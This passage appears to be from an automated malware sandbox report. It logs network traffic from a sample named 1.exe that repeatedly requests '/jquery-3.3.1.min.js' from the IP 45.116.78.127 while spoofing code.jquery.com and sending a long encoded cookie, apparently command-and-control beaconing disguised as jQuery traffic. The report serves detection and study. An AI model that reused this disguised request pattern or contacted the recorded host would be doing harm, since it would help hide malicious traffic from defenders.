                                Jan 2, 2025 10:35:53.873604059 CET50030443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:53.873616934 CET4435003045.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:53.930244923 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:53.930346012 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:53.930439949 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:53.930624962 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:53.930660009 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.109692097 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.109772921 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.110213041 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.110236883 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.111417055 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.111430883 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.773520947 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.773578882 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.773642063 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.773642063 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.773653030 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.773698092 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.785859108 CET50031443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.785901070 CET4435003145.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.852111101 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.852159977 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:55.852233887 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.852494955 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:55.852509975 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.023479939 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.023569107 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.024249077 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.024260044 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.025952101 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.025957108 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.685329914 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.685410976 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.685452938 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.685499907 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.685519934 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.685563087 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.704967976 CET50032443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.704997063 CET4435003245.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.790302992 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.790342093 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:57.790462971 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.790823936 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:57.790834904 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:58.954056025 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:58.954272032 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:58.954813957 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:58.954822063 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:58.956211090 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:58.956217051 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.670152903 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.670226097 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.670311928 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.670361042 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.670387983 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.670434952 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.675111055 CET50033443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.675127029 CET4435003345.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.729410887 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.729463100 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:35:59.729553938 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.729788065 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:35:59.729803085 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:00.903534889 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:00.904155970 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:36:00.904819965 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:36:00.904831886 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:00.906459093 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:36:00.906465054 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:01.621907949 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:01.621962070 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:36:01.621987104 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:01.622041941 CET50034443192.168.2.545.116.78.127
                                Jan 2, 2025 10:36:01.622041941 CET4435003445.116.78.127192.168.2.5
                                Jan 2, 2025 10:36:01.622081041 CET50034443192.168.2.545.116.78.127
                                • code.jquery.com
                                  • 45.116.78.127
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54970445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:00 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:01 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:00 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:01 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.54970545.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:09 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:10 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:10 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5692
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:10 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.54970645.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:11 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:12 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:12 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:12 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.54970745.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:13 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:14 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:14 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:14 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.54970845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:15 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:16 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:16 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:16 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.54971445.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:17 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:18 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:18 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5671
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:18 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.54971745.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:19 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:20 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:20 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5607
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:20 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.54972845.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:21 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:22 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:21 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5649
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
                                2025-01-02 09:34:22 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.54973945.116.78.1274435540C:\Users\user\Desktop\1.exe
                                TimestampBytes transferredDirectionData
                                2025-01-02 09:34:23 UTC511OUTGET /jquery-3.3.1.min.js HTTP/1.1
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                Referer: http://code.jquery.com/
                                Accept-Encoding: gzip, deflate
                                Cookie: __cfduid=XLG2LgCGbLSE7SiH4vmvowijdnet_2ch_OL6z79Cp09YEmeGL4eHC3KUxHmOyZLRAfm66fYulDJsLg2UCuX_p46kDn1VIDEzF-Y4JwtRrGkk-7VrUGrEooAFE-iVp12Khg_CmBu86f4RPCYxYwlPFRyziBEuLfoHz4ruWxmQu5I
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                Host: 45.116.78.127
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                2025-01-02 09:34:24 UTC267INHTTP/1.1 200 OK
                                Date: Thu, 2 Jan 2025 09:34:23 GMT
                                Server: NetDNA-cache/2.2
                                Content-Length: 5628
                                Keep-Alive: timeout=10, max=100
                                Connection: keep-alive
                                Content-Type: application/javascript; charset=utf-8
                                Cache-Control: max-age=0, no-cache
                                Pragma: no-cache
